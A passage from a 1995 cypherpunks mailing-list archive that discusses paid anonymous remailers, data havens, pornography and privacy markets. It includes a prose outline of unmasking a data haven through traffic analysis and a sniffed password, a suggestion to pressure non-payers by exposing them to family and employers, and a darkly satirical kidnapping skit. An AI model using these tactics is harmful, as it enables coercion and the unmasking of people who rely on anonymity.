79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z +FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A =gvPB -----END PGP SIGNATURE----- From abostick at netcom.com Mon Jan 9 15:22:24 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 9 Jan 95 15:22:24 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <9501090353.AA13655@anchor.ho.att.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9501090353.AA13655 at anchor.ho.att.com>, wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204) wrote: > My initial reaction to "Anonymous video conferencing" was > "That's when you wear black ski masks and use voice scramblers > and call from video payphones", i.e. not very useful. > ("Subcomandata Marcos here...") I thought so too, at first; but then I thought of this obvious application: The scene is a bare room, with a single chair in the middle. Seated on the chair is THE VICTIM, whose head covered in a hood. The victim's hands are bound to the armrests, and the legs to those of the chair. A KIDNAPPER enters the scene and walks over to the victim. The kidnapper's face is obscured, either by a hood or ski mask, or by digital scrambling of the image. The kidnapper's voice is scrambled digitally. The kidnapper pulls the hood off of the victim's head, and speaks. KIDNAPPER: Okay, you're on! Talk! The camera slowly zooms in on the victim's face. VICTIM (tentatively): Mom? Dad? It's me. DAD (voice over): Is that really you, son? Are you all right? VICTIM: It's me. I'm okay. This is no picnic, but they're treating me okay, considering. Listen, have a message they want you to pass on to the President. DAD: I don't know if I can get it to him. It's not like we play golf together. VICTIM (nervously): You have to. You'll find away. Tell the President that he has to pull the troops out of Belgrade. If the U.S. forces aren't pulled completely out by the end of this month, they say they're going to cut me into pieces and send them to you piece piece. . . . etc. Whether technology is going to be developed for the convenience of kidnappers and terrorists is an open question. But there is clearly at least this one clear use for anonymous video conferencing. There are probably more. | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible. finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLxG1reVevBgtmhnpAQH+jwL/cAzxwneTG6Wl7H9VCasFBH8X4daM8NUx ORKp06DYybTv45h2baQtINvpDceD4nHt3OThvIEMVg6FCGNq2fBolZHOqTwYP1K6 66QNxEjlyKiQ5dkNKPlwgabFZ6pR0H5y =sbqg -----END PGP SIGNATURE----- From abostick at netcom.com Mon Jan 9 15:32:00 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 9 Jan 95 15:32:00 PST Subject: Vinge's True Email name ? In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501091628.KAA00456 at Starbase.NeoSoft.COM>, you wrote: > If you *really* want to send him fan mail, I recommend sending it in > paper form to his publisher. First, this allows him to better handle > fan mail in batches. Second, this gives his publisher some indication > of interest in his work, and maybe gets him a better deal on his next > book. And if you *really* want to send Vernor Vinge fan mail, and you *can't* *stand* the notion of sending it via snailmail, you can send email to his publisher: pnh at tor.com . That's the email address for Patrick Nielsen Hayden, senior editor at Tor Books. Patrick will know what to do with it. (n.b.: I don't think Patrick is actually Vinge's editor; I think [but am not sure] that Vinge's editor is Jim Frenkel, who oddly enough is married to Vernor Vinge's ex-wife, Joan Vinge.) (Cypherpunks Duncan Frissell and Sandy Sandfort may recall Patrick from his salad days in San Francisco, when he was part of the crew which took over FREEDOM TODAY and FREE MARKET REPORTER magazines in 1978.) | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible. finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLxGaoeVevBgtmhnpAQFYxQL+JqH6lhYdbhZ5uxaQS8G6dnvtLAZEt49b Ye/jJG1xpQGqsLu1wV3pCPDvo+/MUHF6dX8Jt/VaSy4aAkFz3dqm3n9btjWBwvpt LHQjBqwg70PAyiiJ9/MdYj9pUCeurFqr =5A8z -----END PGP SIGNATURE----- From pstemari at erinet.com Mon Jan 9 15:33:37 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Mon, 9 Jan 95 15:33:37 PST Subject: for-pay remailers and FV Message-ID: <9501092326.AA05351@eri.erinet.com> At 03:53 PM 1/9/95, Doug Barnes wrote: > ... Also, there is no reason on earth to take FV for payment under >such a scheme, if one wishes to preserve anonymity, and not have >to deal with the fraud/reversal factors. (The stamp issuer >would not know which blind-signed stamps were issued to the >turkey who reversed all his credit card transactions two months >after buying them -- see various threads on this vis-a-vis >using FV to buy blinded digital cash and why it won't work too >well.) > ... I don't see any reason to get FV involved, unless one were so lame >as to be unable to get signed up directly with the credit card >companies as a merchant -- a process of appropriate complexity >to indicate the posession of at least one (1) clue, which is prob. >desirable in someone who's going to be handling remailer finances MC/Visa require the reversibility of transactions as a condition of their merchant agreements. It's not something peculiar to FV. In fact, under certain conditions it is mandated by federal law. Escort services have a similar problem as far as non-returnability goes, but I don't know how they finesse their way around it. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pierre at shell.portal.com Mon Jan 9 15:58:54 1995 From: pierre at shell.portal.com (Pierre Uszynski) Date: Mon, 9 Jan 95 15:58:54 PST Subject: for-pay remailers and FV In-Reply-To: <9501092235.AA15387@tadpole.tadpole.com> Message-ID: <199501092359.PAA27987@jobe.shell.portal.com> Doug Barnes said: > > Sandy -- > > I for one read your proposal and thought, "yep, that's how it > should work" and considered the problem solved. Not being a > remailer operator (yet) I didn't want to get involved until I > was or I had a more concrete proposal (e.g., "I am now accepting > $$ for E-stamps, of the form ...") Same here, but from the other tack: "Remailer Guild??? Give me a break :-)" My problem with the idea of "Guild" (or any quasi general agreement) of remailer operators is that: On the one side: - The whole idea of a using a remailer chain comes from distrust of the operators. The operators should be the ones to distrust each other the most. And on the other side: - Most of the arguments I see in favor of some higher organisation comes from difficulties for the users in using the current payment systems without trace, and come from getting more weight in establishing policies. Simply put, we'll get to untraceable cash (usable as stamps on every envelope level), and we'll get to systematically encrypted messages (policy only relevant at last stage remailers) soon enough. A guild trying to distribute funds would need a system of accounting that the operators themselves couldn't mess up. Good luck. On the other hand, once you have: - anonymous, untraceable e-money (small amounts are fine, no large bank backing is fine, a simple anonymized Netcash would be fine. Remailers won't be making big money from any single cheating entity anytime soon.) - reputation systems, in the line of the current remailer pinging. They could include price surveys too. I also see them handling more flow control missions in particular for "everyone a remailer" remailers. - mailing tools that juggle for you all the different types of remailers, cash, and rep systems. Then and only then, you get for-pay remailers. There is still a need for political and legal support for last stage remailers but that's pretty likely to be country specific, and that's certainly independant from a payment system (which would be netwide). Finally, I do not believe that introducing payment in the remailer system would curb abuse in any significant way. Significant abuse is that which causes significant problems for the operators: posting secret religious technology, forging prime minister mail, harrassing a member of any number of opposite persuasions, etc... Do you think for a minute that a 5 cents postage is going to stop these messages now? And how about when remailers do attain good reliability and untraceability, for 3 cents? Give up already: remailers are going to transport lots of material that will be offensive to somebody, illegal somewhere, in bad taste here, or at least that somebody (with guns) will want to trace. That's the whole point of remailers. Remailers that want to limit the heat can, for now, restrict to encrypted traffic, there is certainly no dishonor to that. Pierre. pierre at shell.portal.com From lmccarth at ducie.cs.umass.edu Mon Jan 9 17:09:54 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 17:09:54 PST Subject: revoked transactions/guerrilla fee remailers Message-ID: <199501100115.UAA15109@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Paul J. Ste. Marie writes: > MC/Visa require the reversibility of transactions as a condition of their > merchant agreements. It's not something peculiar to FV. In fact, under > certain conditions it is mandated by federal law. Escort services have a > similar problem as far as non-returnability goes, but I don't know how they > finesse their way around it. Two plausible tactics for escort services: [0] Price inflation: treat a revoked transaction rather like shoplifting, by passing the costs on to the customers; escort services are not cheap [1] Embarrassment: tip off family and employers of people who accept escorts, then decide not to pay for them; the perceived threat of publicity should keep plenty of folks in line There's not much that can be done to someone who uses an escort service once, revokes the transaction, and doesn't care who knows about it. How might this apply to remailing services ? Right now, with a fairly small customer base, I imagine price inflation would be impractical, but embarrassment might prove fairly effective. In the developed market we envision, presumably operators could get away with price inflation, but embarrassment would lose much of its potential sting. (I assume that once a critical mass of populace uses remailers, an announcement that Josie Worsham has used a remailer would elicit only yawns.) Do others see the resulting applicability of additional regulations to remailers as an issue in having them charge for service ? Within the category of fee-charging remailers, the distinction between non-profit and for-profit operations may be worth considering. I suppose that the IRS and analogous agencies would be inclined to ask questions about it, for starters. My threat model for the remailer bramble includes, at a minimum, a host of typical government agencies obligated to wrap everything in red tape. Look for anti- trust investigations to be launched against a price-fixing cartel of remailers. - - From what I've seen so far, accepting payment would seem to make anonymous _operation_ of a remailer well nigh impossible. Anonymous operation with revenue would require a corresponding level of anonymity in the transfer of money. Until such time as conversion of funds from a net-liquid form to a conventional form becomes unnecessary (or just commonplace ?), financial traffic analysis can't adequately be thwarted. All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla remailers charging for service any time soon. There's just too much infrastructure to which they'd need to be tied at the moment. -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxHeC2f7YYibNzjpAQGhlQP/fkyvN0QqDkbLhgqecGUaeu3cbCstMd4y lgs/XzCeiXVt6EiQ8tmDVbq4G0QYTGntph/3knciJopGrH+Nu6LVmiqWNiRWFxm8 zJBRenCW2SN9nRixJiI4S2n0yQ//v9C7sOEfmu9SToQDYc+U1CBNSUhhJAveT1GN BD4WNFlm/WY= =VY8W - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxHfcSoZzwIn1bdtAQGyEAGAwKES86hkJ8GkLsYCr+vEAjH1/L2GdrCj jw0b83L7FHA99sUihIYe2zUUxr+Sqb2b =7Aai -----END PGP SIGNATURE----- From dfloyd at io.com Mon Jan 9 17:25:52 1995 From: dfloyd at io.com (dfloyd at io.com) Date: Mon, 9 Jan 95 17:25:52 PST Subject: Data Haven problems In-Reply-To: Message-ID: <199501100125.TAA29250@pentagon.io.com> > > On Mon, 9 Jan 1995, Mats Bergstrom wrote: > > > Hardly. (*.gi0 and *.jp0 for a start?) > > But what are data havens for, if not for controversial data? > > One of the greatest needs, if not _the_ greatest, in our times > > for a data haven is probably for storing porno. There is a > > tremendous, world-wide demand for porno. Yet, there are numerous > > countries where sex.gif's found on your disk (encrypted or not, > > they can use thumb-screws to force the key out of your hands) > > will put you in a very difficult situation (loss of social > > status, jail, decapitation). It might be much more convenient > > for, let's say, a Saudi teenager to store his encrypted private > > gif's in a data haven in Sweden, download them when he feels > > the urge and purge the copies after every use. > > My feelings exactly. > > Are we going to fall prey to the medias asault on porno and resort to > self-censorship? If a data haven resorted to filtering out all gifs and > jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my > porn, nor for my other data. If it is going to be a datahaven it can;t > fall to such things as filtering data for controversial subject the owner > doesn't like. > > > i want to know everything http://www.mcs.com/~nesta/home.html > i want to be everywhere Nesta's Home Page > i want to fuck everyone in the world & > i want to do something that matters /-/ a s t e zine > My problem is not that people will bitch about my DH. My problem will be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then making a long report how I cater to p*dofiles and other evil denezins that pop from time to time. Then, I get the police knocking at my door, asking me to come to Club Fed for a looooonnnggg vacation. Of course, the DH will be hidden by a good remailer (anon.penet.fi), but it is trivial to use traffic analysis to find where the DH lies. Just monitor traffic from/to the remailer and do a series of store/retrives. Then for confirmation, forge a mail from the dh site to the remailer with the password (obtained from sniffing) to yourself. This is the main reason I haven't worked on this code for so long, as well as finals and other distractions. Until I find a decent solution to this problem (The alpha test will be a snap... just allow certain people to send/get and ban all others, but once in full working mode this ceases to be a solution.) I am hesitant on setting up a working DH. From shamrock at netcom.com Mon Jan 9 17:35:14 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 9 Jan 95 17:35:14 PST Subject: SafeBoot PC Security System Message-ID: I helped setting up the DigiCash booth at the RSA conference last night when some guy in the same room with us handed me a copy of their SafeBoot PC Security System. It consists of a processor, real-time clock, some other gadgets, and a magnetic transducer -- all embedded in a 3.5 inch floppy casing -- as well as some supporting software. The system interacts with the read/write head of the floppy drive, pretending to be a floppy. It is supposed to do provide for secure drive encryption (DES) and other things. Seems they are giving away one of these devices to each attendee of the conference. Does anyone on this list have experience with this device? I understand it has been out for a while. I use a Mac at home, and while I am resposible for some PC's at work, these are used for alpha testing of hardware components only , which makes them pretty unstable the way it is and I don't really want to add more trouble just to them to give the device a good workout. Sounds interesting, though... -- Lucky Green PGP encrypted mail preferred. From jrochkin at cs.oberlin.edu Mon Jan 9 17:37:08 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 9 Jan 95 17:37:08 PST Subject: revoked transactions/guerrilla fee remailers Message-ID: At 8:15 PM 01/09/95, L. McCarthy wrote: >- - From what I've seen so far, accepting payment would seem to make anonymous >_operation_ of a remailer well nigh impossible. Anonymous operation with >revenue would require a corresponding level of anonymity in the transfer of >money. Until such time as conversion of funds from a net-liquid form to a >conventional form becomes unnecessary (or just commonplace ?), financial >traffic analysis can't adequately be thwarted. >All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla >remailers charging for service any time soon. There's just too much >infrastructure to which they'd need to be tied at the moment. Well, that's certainly true, for the reasons you gave. Right now, it's enough of a chore just to get non-anonymously run remailers charging for operation. And it's not easy to set up an effective guerilla remailer either. I think the set of tools and environments that make it possible to run a remailer anonymously and charge for it certainly aren't going to exist until the component problems of charging for a remailer at all and running a guerilla remailer at all are made easy. I think once both of those problems are dealt with, it won't be too dificult to deal with the combined problem of guerilla for-pay remailers. Or at least, exactly what things are neccesary to solve that combined problem will be obvious. From root at einstein.ssz.com Mon Jan 9 17:44:27 1995 From: root at einstein.ssz.com (root) Date: Mon, 9 Jan 95 17:44:27 PST Subject: Pornography, What is it? Message-ID: <199501100141.TAA00216@einstein.ssz.com> From: ravage at bga.com To: cpunks the world over Hi all, I am very interested in the data haven issue now that I have my site up. The aspect of pornography is a problem that has to be faced. To this end, I would like to ask that we look at how pornography is defined. >From my own view, I fail to see any way to truly define pornography as anything other than the ravings of a neurotic (both on a personal and a societal level). Every example of pornography I have seen has been put in that category because it contravenes some personal or group taboo. Take care. From rockwell at nova.umd.edu Mon Jan 9 18:25:54 1995 From: rockwell at nova.umd.edu (Raul Deluth Miller) Date: Mon, 9 Jan 95 18:25:54 PST Subject: data havens Message-ID: <199501100225.VAA08907@nova.umd.edu> The problem with encryption, in general, is that it's an attempt to hide information -- unless the information is trivial, encryption is only a temporary measure. Believe it or not, the government (or, more properly, people associated with the government) is still trying to figure out which industries are Iraqi owned -- one technique being brought to bear is statistical analysis of company activities, with special attention to changes which occurred during the gulf war. The only way to have data havens be acceptable to the U.S. government would be to have them become acceptable to the U.S. population (or some significant fraction of them). This would imply phasing out the DEA and the IRS, at a minimum. [Newspaper article this weekend: how it's so horrible that some people deal in cash and thus are evading the IRS.] More generally, the way to keep a data haven from being located is to make sure it doesn't have a location... This is hard to do without severely impacting latency. -- Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. (,-:<:)pq is four large primes, e medium x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d From rishab at dxm.ernet.in Mon Jan 9 18:45:28 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 9 Jan 95 18:45:28 PST Subject: Privacy markets Message-ID: mkj at october.ducktown.org wrote: > Bottom line: Anonymity is the only available tool which puts control > over my own privacy firmly into my own hands, where it belongs, and > does so without infringing on anyone's freedom of speech. Certainly Some months ago I extended this to the concept of privacy markets - where individuals will be able to disclose their 'truename value' to providers of services (such as libraries, publications) whose marketing would benefit, in lieu of cash. I rather think big business is in a better position than government to exploit the 'profiling' fallout of universal use of truenames. In the hope of increasing the declining signal content on the list, I'm reposting my article: ====================== Electric Dreams Weekly column for The Asian Age by Rishab Aiyer Ghosh #35, 31/October/1994: Selling privacy as a commodity It was once said that you should never post publicly to cyberspace what you don't want to see in tomorrow's newspapers. While newspapers are rarely interested in your idle thoughts, others are. Future employers, advertisers and an army of 'user profilers' have begun to exploit the availability of huge data banks of Net traffic, just waiting to be indexed by your names and opinions. It is already possible to buy CD-ROM or tape archives of posts to newsgroups on the Internet. Collecting newsgroup posts as they arrive is trivial. Apart from ordinary Internet connections, all newsgroups are available on one- way, open-access satellite data broadcasts. As traffic flows in, it can be indexed and backed up on extremely cheap storage media such as Digital Audio Tape, for later search and retrieval. While the US National Security Agency is naturally one of the best at hunting for signs of incorrect thinking in cyberspace, several techniques to search large volumes of data by very flexible criteria are publicly available. Electronic writing is one of the best sources for employers to learn the views of prospective employees. The groups people participate in can also form useful inputs to consumer profiles. Some companies have already started offering directory services based on posts to USENET, the semi-official collection of major newsgroups. It is easy to imagine Profiles-R-Us shops that sell dossiers on any individual, detailing political, religious and sexual preferences, and other interesting tidbits - all the nasty things you ever said about Microsoft, for instance! Public discussion is of course just that, and it's ridiculous to attempt to prevent it being put to use for purposes not originally intended. The remedy to an invasion is to build walls; when the invasion is one of privacy, the walls are technological. Some pioneers are already protecting themselves through the use of encryption, digital signatures, and multiple pseudonyms - making it impossible for profilers to associate opinions with real people. In a way, the Invasion Of The Profilers is a good thing - it will make individuals realize what little privacy they have, and teach them the value of privacy. Not everyone will want to seal themselves in private cocoons. Most will not object to some loss of privacy, but in exchange for a (not necessarily monetary) share of the profilers' profits. Individuals will control their privacy and selectively reduce it when it benefits themselves. A particularly useful application of this is in an electronic public library. Once access to data is severely restricted to protect intellectual property rights, the Internet as a source of knowledge for everyone will die, unless libraries are opened to provide information free of cost. Such libraries need not survive on subsidies; rather, they can ask for a copy of any information base in cyberspace from all publishers. By limiting access to individuals who are willing to give up some privacy, the library and publishers will benefit from the sale of users' access records to advertisers. Advertisers will be delighted, as most other inputs for profiling in a privacy- aware society will be unavailable. Finally, users will get free access to information if they so choose, at a cost that they can agree to. While one can be frightened by the ease with which a multitude of Big Brothers can monitor the citizens of cyberspace, technology, as always, has something for everyone. As it becomes easier to search through electronic communications, it also becomes easier to protect privacy to varying degrees. Individuals will be forced to be aware of risks to their privacy. With the opening of markets for profiles, privacy may finally find a concrete value. Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in). --====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====-- This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in) --==================================================================-- ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From nesta at nesta.pr.mcs.net Mon Jan 9 18:58:04 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 18:58:04 PST Subject: Experiments and Toys vs. the Real Thing In-Reply-To: <199501091946.LAA06410@netcom18.netcom.com> Message-ID: On Mon, 9 Jan 1995, Timothy C. May wrote: I was one who wrote a post saying that a data haven should support all files, including porno and such things, and that filtering would be bad karma. I was under the assumption then that we were talking about fully operational, well established Data-havens, as in I thought were were speaking mostly hypotjetically. I agree with tim when it comes to the experimental stage of a project. > Digital cash is more clearly still at the experimental level, as are > anonymous markets (like BlackNet), data havens, and so forth. > I would like it if the person who is working ont eh datahaven code would give us soem more information, like what it does, what are the plans for it etc.. DataHaven is a vague word. Blacknet is going on right now, only none of uf are involved in it, not to say I'm so k-rad and kool that i am underground and involved in it, but eh anonymous market is alive today, JUST that it isn't bieng studied, like one such as BlackNet concievably owuld have been. There are definetly people making anon. transactions out there. > The recent claims that nascent "data havens" _must_ support all files, > including hard-core porn, weapons secrets, etc. seems to be an example > of this. I'm not for censorship, just concerned that the data haven > _experiments_ are not secure enough, not robust enough, to actually > carry high-visibility files. > I was refering to the finished, established project, and not the experiment/study level. > (And let's not forget "snatch teams" that grab foreign nationals > suspected of crimes...Israel, Iraw, Iran, and the U.S. have grabbed > people in other countries. And more common is simple execution. If a > Swedish data haven carried files related to U.S. operations, and the > data haven location was known--part of what I mean by saying the > enabling technologies do not yet exist--then various measures would be > applied. Diplomatic, equipment sabotoage, even killing the operators. > I'm not being Ludlumesque here...clearly such "threats to national > security" would be seen as justifying various reactions. Especially to > send a message to other potential operators.) > Sterling's _Islands In The Net_ is a must read for this topic matter. In this book, the DataHaven operators maintain security thru the data they horde, by hoding it over poeples heads, and also by just plain technical savvy(ala action thrillers hehe) > --Tim May, who thinks the first real data havens will come under > intense attack and so had better be secure from the start > I would like to help get them off the ground, by either providing help with code, policy, or just another head in teh game. They are a techno fetish of mine, I mean I'm even nymed after one, Nesta Stubbs, from _Islands In The Net_ From remailer-admin at ideath.goldenbear.com Mon Jan 9 19:07:00 1995 From: remailer-admin at ideath.goldenbear.com (Anonymous User) Date: Mon, 9 Jan 95 19:07:00 PST Subject: No Subject Message-ID: <199501100222.AA15620@ideath.goldenbear.com> Pierre Uszynski writes: > Significant abuse is > that which causes significant problems for the operators: posting > secret religious technology, forging prime minister mail, harrassing a > member of any number of opposite persuasions, etc... on that note, check out this excerpt from the remailer-help file of the q at c2.org remailer: > Abuse/Self-Preservation Policy: > Abuse of the Q Mixmaster Remailer consists in those uses of the remailer > which endanger its continued operation. Please don't ruin anonymity > services for those people with legitimate needs for them. From nesta at nesta.pr.mcs.net Mon Jan 9 19:09:47 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 19:09:47 PST Subject: Data Haven problems In-Reply-To: <199501100125.TAA29250@pentagon.io.com> Message-ID: On Mon, 9 Jan 1995 dfloyd at io.com wrote: > My problem is not that people will bitch about my DH. My problem will > be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then > making a long report how I cater to p*dofiles and other evil denezins > that pop from time to time. Then, I get the police knocking at my > door, asking me to come to Club Fed for a looooonnnggg vacation. > I myself see nothing wrong with selectivly choosing your users at this juncture. With an experimental server that wouldn't have the back-up to protect itself fomr attacks in real-space(police feds guns dogs fundies) you DO need to be careful. If you wanna turn this into a profit thing(which is possible) you then would get to choose your clients. I guess what I meant o say in tha tlast letter, was directed towards a full-fledged, well established and backed DataHaven that was not run for profit, but rather as a service to help the public(yeah, I know this lists idea on those projects, I wont go that direction no more) and thus would need to be open liek that. > Of course, the DH will be hidden by a good remailer (anon.penet.fi), but > it is trivial to use traffic analysis to find where the DH lies. Just > monitor traffic from/to the remailer and do a series of store/retrives. > Then for confirmation, forge a mail from the dh site to the remailer with > the password (obtained from sniffing) to yourself. > Well for an experiemnt that is fine, and I don't see it then much mroe then a listerv file service with encryption, unless i am missing something in teh DataHaven you have planned. But later on when you wanna get serious and shit, you could get better shielding then that, depending on how much money you wanna spend. Everythign from offshore sites with sattelite feeds or radio feeds(encrypted of course) with physical securiy measures and such. > This is the main reason I haven't worked on this code for so long, as > well as finals and other distractions. Until I find a decent solution > to this problem (The alpha test will be a snap... just allow certain > people to send/get and ban all others, but once in full working mode > this ceases to be a solution.) I am hesitant on setting up a working > DH. > I would set one up if I had the code tha tmet my standards(I don't have time right now to write it myself, but maybe if this thread goes well i will be inspired enough to order a few pizzas and go for it). Right now my connection is muc much too slow to allow such traffic. This is somethign i have been doing some serious thinking about also. I cn actually see it bieng possible for me to have a small scale experiemntal data haven up and running in the near future, acting not only as a drop box, but also as a storage place and database of obscure information. From nesta at nesta.pr.mcs.net Mon Jan 9 19:13:27 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 19:13:27 PST Subject: Pornography, What is it? In-Reply-To: <199501100141.TAA00216@einstein.ssz.com> Message-ID: On Mon, 9 Jan 1995, root wrote: > > From: ravage at bga.com > To: cpunks the world over > > Hi all, > > I am very interested in the data haven issue now that I have my site up. The > aspect of pornography is a problem that has to be faced. To this end, I would > like to ask that we look at how pornography is defined. What you define as pornography doesn't mean shit, it's what the media and jornalists and fundies etc.. decide is pornographic that you gotta watch out for. This means just about anythign that isn't vanilla After School Special material is suspect. I too mayt have a site int eh near future, so I am interested int eh project also, as I have always been really into the idea of data-havens. I think that a self-sufficient data-haven is going to need alot of resources tho to continue it's operation past the pont were it is known to exist. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From pstemari at erinet.com Mon Jan 9 19:30:14 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Mon, 9 Jan 95 19:30:14 PST Subject: Data Haven problems Message-ID: <9501100322.AB12220@eri.erinet.com> At 07:25 PM 1/9/95, dfloyd at io.com wrote: > ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but >it is trivial to use traffic analysis to find where the DH lies. Just >monitor traffic from/to the remailer and do a series of store/retrives. >Then for confirmation, forge a mail from the dh site to the remailer with >the password (obtained from sniffing) to yourself. ... Hmm, hmm. Using c'punk remailers with encrypted send blocks fixes one problem, especially if the c'punk mailers do some sort of file splitting and reassembly along the lines of what happens to IP packets that are too large for a given link. What would also help would be a mechanism for randomly varying the encrypted send-to block. The password replay attacks can be fixed by encrypting the transmitted password along with a timestamp/sequence number. One problem that remains would be a trail left by the increased traffic to/from a DH vs a normal user. That could only be fixed by a multitude of DH sites. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From rockwell at nova.umd.edu Mon Jan 9 20:07:07 1995 From: rockwell at nova.umd.edu (Raul Deluth Miller) Date: Mon, 9 Jan 95 20:07:07 PST Subject: Pornography, What is it? Message-ID: <199501100406.XAA14238@nova.umd.edu> Pornography is in the eyes of the beholder. [Especially if the beholder happens to be a postmaster in Memphis...] -- Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. prim=:1&=@| 2&^@<: [. large=:>&(2^1024) x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d From root at einstein.ssz.com Mon Jan 9 20:36:44 1995 From: root at einstein.ssz.com (root) Date: Mon, 9 Jan 95 20:36:44 PST Subject: Pornography, What is it? In-Reply-To: Message-ID: <199501100432.WAA00738@einstein.ssz.com> > > > > I am very interested in the data haven issue now that I have my site up. The > > aspect of pornography is a problem that has to be faced. To this end, I would > > like to ask that we look at how pornography is defined. > > What you define as pornography doesn't mean shit, it's what the media and > jornalists and fundies etc.. decide is pornographic that you gotta watch > out for. This means just about anythign that isn't vanilla After School > Special material is suspect. > I am well aware that what I personaly consider pornography carries little weight. But it does carry some since I do vote. There is the whole issue of community standard that has been left out of this discussion so far and that means that I as a taxed land owner (5 acres in Lockhard, TX) get to sit on juries now and again. In that sense what I believe can carry a lot of weight. Even to the point of refusing to convict somebody because I personaly feel a law or precedence is incorrect. But when you consider states like Oregon where the whole concept of pornography has been removed from the books it makes me have a little hope for sanity. My personal contention is that pornography does not exist any more than good or evil do, these concepts are based on our personal ethos not anything absolute. > I too mayt have a site int eh near future, so I am interested int eh > project also, as I have always been really into the idea of data-havens. > I think that a self-sufficient data-haven is going to need alot of > resources tho to continue it's operation past the pont were it is known > to exist. > As to data havens being dangerous to run...I don't know. At the recent HoHoCon there was a long discussion 'bout networks hidden within networks that was very intriguing. If Doug Barnes is reading this he may be willing to reiterate some of the talk. I do know that at the moment my partners and myself are looking at remailer software running under Linux and data havens are something that we have discussed. I personaly see data havens as a repository for information that is beyond the keen of governments to regulate. This is the key point to me. Not whether it is industrial secrets, military secrets, or .gif's that jr. can get his rocks off over. I see the whole pornography issue as a red herring that keeps the dim-witted and ignorant busy on while everyone else with a clue gets on with their own personal agenda. I do not mean this to imply a conspiracy, simply that most DA's have something they want (ie political clout) and they will in general do whatever it takes to get. In a sense one could consider such regulatory agencies as mercenaries for personal gain. > i want to know everything http://www.mcs.com/~nesta/home.html > i want to be everywhere Nesta's Home Page > i want to fuck everyone in the world & > i want to do something that matters /-/ a s t e zine > From nesta at nesta.pr.mcs.net Mon Jan 9 21:07:46 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 21:07:46 PST Subject: Pornography, What is it? In-Reply-To: <199501100432.WAA00738@einstein.ssz.com> Message-ID: On Mon, 9 Jan 1995, root wrote: > As to data havens being dangerous 